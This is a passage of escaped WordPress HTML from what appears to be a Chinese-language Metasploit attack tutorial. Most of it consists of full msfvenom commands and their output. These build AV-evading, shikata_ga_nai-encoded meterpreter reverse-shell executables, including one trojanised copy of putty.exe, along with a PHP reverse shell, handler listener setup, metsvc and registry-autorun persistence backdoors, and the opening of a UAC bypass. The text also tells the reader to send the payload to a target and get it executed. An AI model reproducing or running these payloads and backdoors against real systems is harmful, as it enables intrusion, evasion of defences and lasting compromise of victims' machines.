href=\"http:\/\/i.imgur.com\/UvrlW5T.png\">8.\u62fc\u63a5\u578b<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom -c &lt;shellcode&gt; -p &lt;payload&gt; &lt;payload options&gt; -a &lt;arch&gt; --platform &lt;platform&gt; -e &lt;encoder option&gt; -i &lt;encoder times&gt; -f &lt;format&gt; -o &lt;path&gt;<\/code><\/pre>\n\n\n\n<p><a href=\"http:\/\/i.imgur.com\/UvrlW5T.png\">\u6d4b\u8bd5\uff1a<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; msfvenom -c \"win.exe\" -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -x 'F:\/putty.exe' -f exe -o injection.exe<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>DL is deprecated, please use Fiddle<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>No platform was selected, choosing Msf::Module::Platform::Windows from the payload<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Adding shellcode from win.exe to the payload<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Found 1 compatible encoders<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Attempting to encode payload with3 iterations of x86\/shikata_ga_nai<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 5794 (iteration=0)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 5823 (iteration=1)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 5852 (iteration=2)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai chosen with final size 5852<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Payload size: 5852 bytes<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Final size of exe file: 11264 bytes<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Saved as: injection.exe<\/code><\/pre>\n\n\n\n<p><a href=\"http:\/\/i.imgur.com\/TQSCwx8.png\">9.\u641c\u7d22<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom -l | grep windows | grep x64 | grep tcp<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025602258-2062150949.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>10.\u7ed5\u8fc7\u514d\u6740<\/p>\n\n\n\n<p>nops\u9009\u9879<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; msfvenom -l nops<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>DL \n deprecated, please use Fiddle\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Framework NOPs (\n total)\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>========================<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Description<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; ----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -----------<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; armle\/simple&nbsp;&nbsp;&nbsp;&nbsp; Simple NOP generator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; php\/generic&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Generates harmless padding \n PHP scripts\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; ppc\/simple&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Simple NOP generator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; sparc\/random&nbsp;&nbsp;&nbsp;&nbsp; SPARC NOP generator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; tty\/generic&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Generates harmless padding \n TTY input\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; x64\/simple&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; An x64 single\/multi byte NOP instruction generator.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; x86\/opty2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Opty2 multi-byte NOP generator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; x86\/single_byte&nbsp; Single-byte NOP generator<\/code><\/pre>\n\n\n\n<p>payload\u751f\u6210\u5668Veil-Evasion \uff08\u514d\u6740\u6548\u679c\u597d\uff09<br><a href=\"https:\/\/github.com\/Veil-Framework\/Veil-Evasion\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/Veil-Framework\/Veil-Evasion<\/a><br>\u73b0\u5728Veil 3.0<\/p>\n\n\n\n<p><a href=\"http:\/\/i.imgur.com\/kQstH7z.jpg\">11.\u7cfb\u7edf\u67b6\u6784<\/a><\/p>\n\n\n\n<p>(1)\u67b6\u6784<\/p>\n\n\n\n<p>Arch:x86\u3000 \u662f\u6307\u751f\u6210\u7684payload\u53ea\u80fd\u572832\u4f4d\u7cfb\u7edf\u8fd0\u884c<br>Arch:x86_64\u3000\u662f\u6307\u6a21\u5757\u540c\u65f6\u517c\u5bb932\u4f4d\u64cd\u4f5c\u7cfb\u7edf\u548c64\u4f4d\u64cd\u4f5c\u7cfb\u7edf<br>Arch:x64&nbsp;\u3000\u662f\u6307\u751f\u6210\u7684payload\u53ea\u80fd\u572864\u4f4d\u7cfb\u7edf\u8fd0\u884c<\/p>\n\n\n\n<p>(2)\u6ce8\u610f<\/p>\n\n\n\n<p>\u6709\u7684payload\u7684\u9009\u9879\u4e3a\u591a\u4e2a\uff1aArch:x86_64\uff0cx64<br>\u8fd9\u91cc\u4f60\u5c31\u9700\u8981-a\u53c2\u6570\u9009\u62e9\u4e00\u4e2a\u7cfb\u7edf\u67b6\u6784\u3002<br>\u540c\u65f6\u6ce8\u610f\u4ee5\u4e0b\uff1asize(\u5927\u5c0f)\uff0crank(\u7b49\u7ea7)\uff0cexitfunc(\u9000\u51fa\u65b9\u6cd5)<\/p>\n\n\n\n<p>(3)\u7edf\u4e00<\/p>\n\n\n\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\u8f6f\u4ef6\u7684\u67b6\u6784\uff0fpayload\u7684\u67b6\u6784\uff0f\u76ee\u6807\u7cfb\u7edf\u7684\u67b6\u6784<br>\u4e09\u8005\u4e00\u5b9a\u8981\u7edf\u4e00\uff08x86\/x86_64\/x64\uff09\uff0c\u5426\u5219\u4f1a\u51fa\u9519\u3002<\/p>\n\n\n\n<p>\u4e3e\u4f8b1\uff1a<br>payload\/windows\/x64\/meterpreter_reverse_tcp<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; msfvenom -p windows\/x64\/meterpreter_reverse_tcp --payload-option<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>DL \n deprecated, please use Fiddle\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Options \n payload\/windows\/x64\/meterpreter_reverse_tcp:\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Name: Windows Meterpreter Shell, Reverse TCP Inline x64<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp; Module: payload\/windows\/x64\/meterpreter_reverse_tcp<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp; Platform: Windows<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Arch: x64, x86_64<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Needs Admin: No<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code> Total size: \n\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Rank: Normal<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Provided by:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; OJ Reeves<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; sf &lt;stephen_fewer@harmonysecurity.com&gt;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Basic options:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Current Setting&nbsp; Required&nbsp; Description<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ---------------&nbsp; --------&nbsp; -----------<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>EXITFUNC&nbsp;&nbsp;&nbsp; process&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Exit technique (Accepted: \n, seh, thread, process, none)\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>EXTENSIONS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Comma-separate list of extensions to load<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>EXTINIT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Initialization strings \n extensions\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>LHOST&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The listen address<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>LPORT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The listen port\n<\/code><\/pre>\n\n\n\n<p>\u4e3e\u4f8b2\uff1a<br>windows\/x64\/meterpreter\/reverse_tcp<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>load\/windows\/x64\/meterpreter\/reverse_tcp:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp; Module: payload\/windows\/x64\/meterpreter\/reverse_tcp<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp; Platform: Windows<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Arch: x86_64<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Needs Admin: No<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code> Total size: \n\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Rank: Normal<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Provided by:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; skape &lt;mmiller@hick.org&gt;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; sf &lt;stephen_fewer@harmonysecurity.com&gt;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;&nbsp;&nbsp; OJ Reeves<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Basic options:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Current Setting&nbsp; Required&nbsp; Description<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ---------------&nbsp; --------&nbsp; -----------<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>EXITFUNC&nbsp; process&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Exit technique (Accepted: \n, seh, thread, process, none)\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>LHOST&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The listen address<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>LPORT&nbsp;&nbsp;&nbsp;&nbsp; \n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The listen port\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Description:<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp; Inject the meterpreter server DLL via the Reflective<\/code><\/pre>\n\n\n\n<p>\u4eceArch\u770b\u51fa\uff0c\u7b2c\u4e00\u4e2a\u53ef\u4ee5\u7528\u4e8ex64, x86_64\u800c\u7b2c\u4e8c\u4e2a\u53ea\u80fdx86_64\u3002<br>\u8fd9\u662f\u9700\u8981\u6ce8\u610f\u7684\u5730\u65b9\u3002<\/p>\n\n\n\n<p>12.\u81ea\u9009\u6a21\u5757<\/p>\n\n\n\n<p>\u751f\u6210\u6267\u884c\u8ba1\u7b97\u5668payload\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe &gt; 1.exe<\/p>\n\n\n\n<p>13.payload\u7684\u5751<\/p>\n\n\n\n<p>\u6b63\u5e38\u60c5\u51b5\u4e0b\uff0c\u5229\u7528msfvenom\u751f\u6210\u7684\u6728\u9a6c\u6587\u4ef6\uff0c\u53ef\u76f4\u63a5\u4e0a\u4f20\u5230\u76ee\u6807\u670d\u52a1\u5668\u4e0a\u8fd0\u884c\uff08\u52a0\u6743\u9650\uff09\u3002\u4f46\u6211\u81ea\u5df1\u9047\u5230\u8fc7\u4e00\u4e2a\u5751\uff0c\u751f\u6210\u7684\u6587\u4ef6\u5185\u5bb9\u6709\u90e8\u5206\u662f\u65e0\u7528\u7684\uff0c\u4f1a\u5f15\u8d77\u62a5\u9519\uff0c\u5982\u4e0b\u56fe\u6240\u793a\u3002<br><a href=\"https:\/\/thief.one\/upload_image\/20170801\/2.png\"><\/a><br><a href=\"https:\/\/thief.one\/upload_image\/20170801\/3.png\"><\/a><br>\u89e3\u51b3\u65b9\u6848\u662fvim\u6587\u4ef6\uff0c\u5220\u9664\u6587\u4ef6\u5f00\u5934\u4e24\u884c\u65e0\u6548\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x07\u83b7\u53d6meterpreter<\/h2>\n\n\n\n<p>1.\u9996\u5148\u751f\u6210\u53ef\u6267\u884c\u6587\u4ef6<\/p>\n\n\n\n<p>root @ kali\uff1a\u301c\uff03msfvenom -p &nbsp;windows\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444&nbsp; -f exe -o &nbsp;shell.exe<\/p>\n\n\n\n<p>2.\u542f\u52a8msfconsole\uff0c\u76d1\u542c\u53cd\u8fde\u7aef\u53e3<\/p>\n\n\n\n<p>root @ kali\uff1a\u301c\uff03msfconsole<\/p>\n\n\n\n<p>msf&gt;use&nbsp; exploit\/multi \/handler<\/p>\n\n\n\n<p>msf exploit\uff08handler\uff09&gt; set &nbsp;PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n<p>PAYLOAD =&gt; window \/meterpreter\/reverse_tcp<\/p>\n\n\n\n<p>msf exploit\uff08handler\uff09&gt; set LHOST 0.0.0.0<\/p>\n\n\n\n<p>msf exploit\uff08handler\uff09&gt;set&nbsp; LPORT &nbsp;444<\/p>\n\n\n\n<p>msf exploit\uff08handler\uff09&gt;show options<\/p>\n\n\n\n<p>msf exploit\uff08handler\uff09&gt;exploit<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x08 \u6301\u7eed\u6027\u540e\u95e8<\/h2>\n\n\n\n<p>1.metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n<p>metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u5176\u5b9e\u5c31\u662f\u5c06Meterpreter\u4ee5\u7cfb\u7edf\u670d\u52a1\u7684\u5f62\u5f0f\u5b89\u88c5\u5230\u76ee\u6807\u4e3b\u673a\uff0c\u5b83\u4f1a\u4e0a\u4f20\u4e09\u4e2a\u6587\u4ef6\uff1a<\/p>\n\n\n\n<p>metsvc.dll<\/p>\n\n\n\n<p>metsvc-service.exe<\/p>\n\n\n\n<p>metsvc.exe<\/p>\n\n\n\n<p>\u8c03\u7528metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1arun&nbsp; metsvc<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025603968-424290475.gif\" alt=\"\" width=\"554\" height=\"169\"><br>\u6267\u884c\u8fc7\u7a0b\uff1a\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u521b\u5efa\u4e00\u4e2a\u76d1\u542c31337\u7aef\u53e3\u7684\u670d\u52a1-&gt;\u5728\u76ee\u6807\u4e3b\u673ac:\\windows\\temp\\\u4e0b\u521b\u5efa\u4e00\u4e2a\u5b58\u653e\u540e\u95e8\u670d\u52a1\u6709\u5173\u6587\u4ef6\u7a0b\u5e8f\u7684\u76ee\u5f55\uff0c\u5e76\u4e0a\u4f20metsrv.x86.dll\u3001metsvc-server.exe\u3001metsvc.exe\u4e09\u4e2a\u6587\u4ef6\u5230\u8be5\u76ee\u5f55\u4e0b-&gt;\u5f00\u542f\u670d\u52a1<\/p>\n\n\n\n<p>\u6210\u529f\u540e\uff1a\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u770b\u523031337\u53f7\u7aef\u53e3\u5df2\u5f00\uff0c\u4e14\u670d\u52a1\u591a\u4e86\u4e00\u4e2ameterpreter(\u5982\u4e0b\u56fe)<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025604411-977033793.gif\" alt=\"\" width=\"554\" height=\"235\"><br><br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025604909-1866331126.gif\" alt=\"\" width=\"554\" height=\"315\"><\/p>\n\n\n\n<p>\u4f7f\u7528\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025605909-708751152.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5230\u76ee\u6807\u673a\u4e0a\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0Meterpreter\u670d\u52a1\uff0c\u6b63\u5728\u5f00\u542f\u76d1\u542c\u5e76\u7b49\u5f85\u8fde\u63a5\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025606352-1231848696.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>Meterpreter\u670d\u52a1\u540e\u95e8<\/p>\n\n\n\n<p>meterpreter &gt; run metsvc<\/p>\n\n\n\n<p>[*] Creating a meterpreter service on port 31337<\/p>\n\n\n\n<p>[*] Creating a temporary installation directory C:\\Users\\Croxy\\AppData\\Local\\Temp\\tuIKWqmuO&#8230;<\/p>\n\n\n\n<p>[*]&nbsp; &gt;&gt; Uploading metsrv.x86.dll&#8230;<\/p>\n\n\n\n<p>[*]&nbsp; &gt;&gt; Uploading metsvc-server.exe&#8230;<\/p>\n\n\n\n<p>[*]&nbsp; &gt;&gt; Uploading metsvc.exe&#8230;<\/p>\n\n\n\n<p>[*] Starting the service&#8230;<\/p>\n\n\n\n<p>* Installing service metsvc<\/p>\n\n\n\n<p>* Starting service<\/p>\n\n\n\n<p>* Service metsvc successfully installed.<\/p>\n\n\n\n<p>\u4e4b\u540e\u7535\u8111\u5c31\u9ed8\u9ed8\u751f\u6210\u4e86\u4e00\u4e2a\u81ea\u542f\u670d\u52a1Meterpreter<\/p>\n\n\n\n<p>\u7136\u540e\u8fde\u63a5\u540e\u95e8<\/p>\n\n\n\n<p>msf exploit(handler) &gt; use exploit\/multi\/handler<\/p>\n\n\n\n<p>msf exploit(handler) &gt; set payload windows\/metsvc_bind_tcp<\/p>\n\n\n\n<p>payload =&gt; windows\/metsvc_bind_tcp<\/p>\n\n\n\n<p>msf exploit(handler) &gt; set RHOST 10.42.0.54<\/p>\n\n\n\n<p>RHOST =&gt; 10.42.0.54<\/p>\n\n\n\n<p>msf exploit(handler) &gt; set LPORT 31337<\/p>\n\n\n\n<p>LPORT =&gt; 31337<\/p>\n\n\n\n<p>msf exploit(handler) &gt; exploit<\/p>\n\n\n\n<p>2. persistence\u6a21\u5757\u540e\u95e8<\/p>\n\n\n\n<p>\u4e00\u4e2avbs\u540e\u95e8\u5199\u5165\u4e86\u5f00\u673a\u542f\u52a8\u9879\u4f46\u662f\u5bb9\u6613\u88ab\u53d1\u73b0\u8fd8\u662f\u9700\u8981\u5927\u5bb6\u53d1\u6325\u81ea\u5df1\u7684\u667a\u6167:)<\/p>\n\n\n\n<p>meterpreter &gt; run persistence -X -i 5 -p 23333 -r 10.42.0.1<\/p>\n\n\n\n<p>[*] Running Persistance Script<\/p>\n\n\n\n<p>[*] Resource file for cleanup created at \/home\/croxy\/.msf4\/logs\/persistence\/TESTING_20150930.3914\/TESTING_20150930.3914.rc<\/p>\n\n\n\n<p>[*] Creating Payload=windows\/meterpreter\/reverse_tcp LHOST=10.42.0.1 LPORT=23333<\/p>\n\n\n\n<p>[*] Persistent agent script is 148453 bytes long<\/p>\n\n\n\n<p>[+] Persistent Script written to C:\\Users\\Croxy\\AppData\\Local\\Temp\\ulZpjVBN.vbs<\/p>\n\n\n\n<p>[*] Executing script C:\\Users\\Croxy\\AppData\\Local\\Temp\\ulZpjVBN.vbs<\/p>\n\n\n\n<p>[+] Agent executed with PID 4140<\/p>\n\n\n\n<p>[*] Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\okiASNRzcLenulr<\/p>\n\n\n\n<p>[+] Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\okiASNRzcLenulr<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">0x09 meterpreter\u7ed5\u8fc7uac<\/h2>\n\n\n\n<p>\u7531\u4e8e\u7ed5\u8fc7 UAC \u7684\u529f\u80fd\u9700\u5728 meterpreter \u7684shell \u624d\u80fd\u5b9e\u73b0\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u9996\u5148\u8981\u505a\u7684\u5c31\u662f\u53d6\u5f97\u76ee\u6807\u673a\u5668\u7684&nbsp;meterpreter shell&nbsp;\u3002<\/p>\n\n\n\n<p>\uff081\uff09\u751f\u6210\u4e00\u4e2a payload<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.15.131 lport=4444 -f exe -o \/root\/virus.exe -e x86\/shikata_ga_nai -i 8<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025607162-1869060146.gif\" alt=\"20161006093606\"\/><\/figure>\n\n\n\n<p>\u5c06\u4ee5\u4e0a\u751f\u6210\u7684 payload \u53d1\u9001\u7ed9\u76ee\u6807\u673a\u5668\u5e76\u8ba9\u5176\u6267\u884c!<\/p>\n\n\n\n<p>\uff082\uff09kali \u4e0a\u914d\u7f6e\u4e00\u4e2a\u53cd\u5f39\u4f1a\u8bdd\u5904\u7406\u7a0b\u5e8f<\/p>\n\n\n\n<p>msf&gt;use exploit\/multi\/handler<\/p>\n\n\n\n<p>msf&gt;set payload windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n<p>msf&gt;set LHOST 192.168.15.131<\/p>\n\n\n\n<p>msf&gt;set LPORT 4444<\/p>\n\n\n\n<p>msf&gt;exploit<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025607683-2117669758.gif\" alt=\"20161006092923\"\/><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u518d\u4ecb\u7ecd\u4e00\u79cd\uff0c\u751f\u6210\u53cd\u5f39 shell \u7684\u65b9\u5f0f\u3002\u5c31\u662f\u76f4\u63a5\u4ee5&nbsp;raw&nbsp;\u7684\u5f62\u5f0f\u4fdd\u5b58\u6210\u6587\u4ef6\u53ea\u8981\u76ee\u6807\u8fdb\u884c\u4e86\u8bbf\u95ee\uff0c\u5c31\u4f1a\u53cd\u5f39\u56de shell \u3002\u5177\u4f53\u751f\u6210\u547d\u4ee4\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>msfvenom -p php\/meterpreter\/reverse_tcp LHOST=192.168.15.131 LPORT=4444 -f raw -o x.php<\/p>\n\n\n\n<p>\u5f53\u76ee\u6807\u673a\u5668\u6210\u529f\u6267\u884cpayload\u540e\u6211\u4eec\u5c31\u53d6\u5f97\u4e86\u4e00\u4e2a&nbsp;meterpreter shell&nbsp;\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025608028-514920194.gif\" alt=\"20161006094048\"\/><\/figure>\n\n\n\n<p>\uff083\uff09\u5229\u7528 getuid \u548c getsystem \u547d\u4ee4\u6765\u63d0\u6743<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 